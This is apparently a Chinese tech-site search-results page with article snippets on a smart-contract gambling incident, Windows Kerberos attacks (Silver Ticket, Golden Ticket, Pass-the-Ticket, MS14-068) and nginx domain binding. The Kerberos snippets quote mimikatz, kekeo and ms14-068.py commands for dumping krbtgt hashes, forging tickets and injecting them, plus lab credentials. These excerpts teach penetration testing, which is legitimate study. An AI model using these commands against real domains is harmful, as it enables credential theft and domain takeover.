首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    智能合约游戏之殇——God.Game 事件分析

    时间线 2018年08月19日晚十一点半,宣传良久的区块链赌博游戏God.Game合约被创建于以太坊6176235区块。...0x01 合约介绍 智能合约名为God,地址为 0xca6378fcdf24ef34b4062dda9f1862ea59bafd4d,部署于 6176235,发行了名为God币的代币(erc20 token...God.Game主要是一个银行合约,代码有上千行,较为复杂。如果之前对PoWH3D等类似合约有过接触,God便不难理解。下面我们介绍些简单概念。...God币便是符合ERC20协议的代币。 合约功能 在God.Game中,你可以通过eth购买token(god币),当你拥有了token,相当于参加了这个游戏。...官网 http://god.game/#/ 附录1 此次事件相关地址 God合约创建者 0x802dF0C73EB17E540b39F1aE73C13dcea5A1CAAa God合约地址 0xCA6378fcdf24Ef34B4062Dda9F1862Ea59BaFD4d

    88030

    白银票据(Silver Ticket)攻击

    白银票据攻击 环境 攻击者在使用 Silver Ticket(白银票据)对内网进行攻击时,需要掌握下面的信息: 域名 域 SID(就是域成员SID值去掉最后的) 目标服务器的 FQDN 可利用的服务...-1782232778 之后就可以使用 mimikatz 生成伪造的 Silver Ticket 票据:(在不能访问域控制器的mary机器上执行) kerberos::golden /domain:<域名...输入命令查看当前权限是否可以使用 dcsync 与与控制器进行同步: # 命令格式 lsadump::dcsync /dc:域DC /domain:域名 /user:域用户名 # 示例 lsadump:...:dcsync /dc:OWA2010CN-God.god.org /domain:god.org /user:krbtgt ?...这个时候输入命令,使用 dcsync 在域控制器中查询 krbtgt 的密码哈希值: lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org

    3.1K20

    票据传递(Pass The Ticket)攻击与利用

    将票据文件注入内存: mimikatz "kerberos::ptt "[0;4ee98c]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi" ?...---- 使用 kekeo 进行票据传递 kekeo 下载地址:https://github.com/gentilkiwi/kekeo/releases/ kekeo 需要使用域名、用户名、NTLM Hash...域名god.org 用户名:administrator NTLM Hash:ccef208c6485269c20db2cad21734fe7 也就是在目标机器上运行下面的命令,只需要普通权限就可以!...这个时候会在当前路径下生成一个票据文件:TGT_administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi 之后把这个票据文件移动到黑客的机器上,在黑客机器上使用...kekeo 输入命令将移动的票据导入内存: kerberos::ptt TGT_administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi ?

    3.2K20

    Kerberos域用户提权漏洞(MS14-068)分析与防范

    -u:用户名@域名 -s:用户SID -d:域控制器地址 -p:明文密码 --rc4:在没有明文密码的情况下,通过NTLM Hash登录 查看域控制器的补丁安装情况 微软针对 MS14-068 漏洞提供补丁为...生成高权限票据 使用 PyKEY 生成高权限票据命令格式: ms14-068.py -u 域成员@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 域成员:mary 域名god.org...之后会在当前路径下生成一个名为 :TGT_mary@god.org.ccache 的票据文件。...它只需要输入域名、被提权用户的密码、被提权用户、被提权用户的SID,域控制器的IP: 域成员:mary 域名god.org mary 的 sid:S-1-5-21-1218902331-2157346161...@#45 set domain god.org set password admin!

    6.6K54

    黄金票据(Golden Ticket)攻击

    在使用黄金票据(Golden Ticket)攻击时,需要以下信息: 需要伪造的域管理员用户名(一般是域管账户) 完整的域名 域krbtgt SID(就是域成员krbtgt SID去掉最后的) krbtgt...的 NTLM Hash 或 AES-256 值 Golden Ticket 实验环境 域控制器: IP:192.168.3.21 域名god.org 用户名:administrator 密码:Admin12345...域成员服务器: IP:192.168.3.25 域名god.org 用户名:mary 密码:admin!...4、查询域名: ipconfig /all ? 得到的域名为:god.org。 3、实验操作 首先我们是无法查看到域控的共享信息的: dir \\OWA2010CN-God\c$ ?...4、验证权限 我们已经把票据注入到内存了,这个时候我们就可以看看是否获取到了域控的权限: dir \\OWA2010CN-God\c$ ?

    3.7K22

    nginx 域名绑定 域名, nginx 域名绑定 端口

    一、nginx 域名绑定 域名 nginx绑定多个域名可又把多个域名规则写一个配置文件里,也可又分别建立多个域名配置文件,我一般为了管理方便,每个域名建一个文件,有些同类域名也可又写在一个总的配置文件里...一、每个域名一个文件的写法        首先打开nginx域名配置文件存放目录:/usr/local/nginx/conf/servers ,如要绑定域名www.itblood.com 则在此目录建一个文件...:www.itblood.com.conf然后在此文件中写规则,如: server{ listen 80; server_name www.itblood.com; #绑定域名...nginx服务器重起命令:/etc/init.d/nginx restart 二、一个文件多个域名的写法 一个文件添加多个域名的规则也是一样,只要把上面单个域名重复写下来就ok了,如: server{...301跳转 如果不带www的域名要加301跳转,那也是和绑定域名一样,先绑定不带www的域名,只是不用写网站目录,而是进行301跳转,如: server { listen 80; server_name

    69.9K73
    领券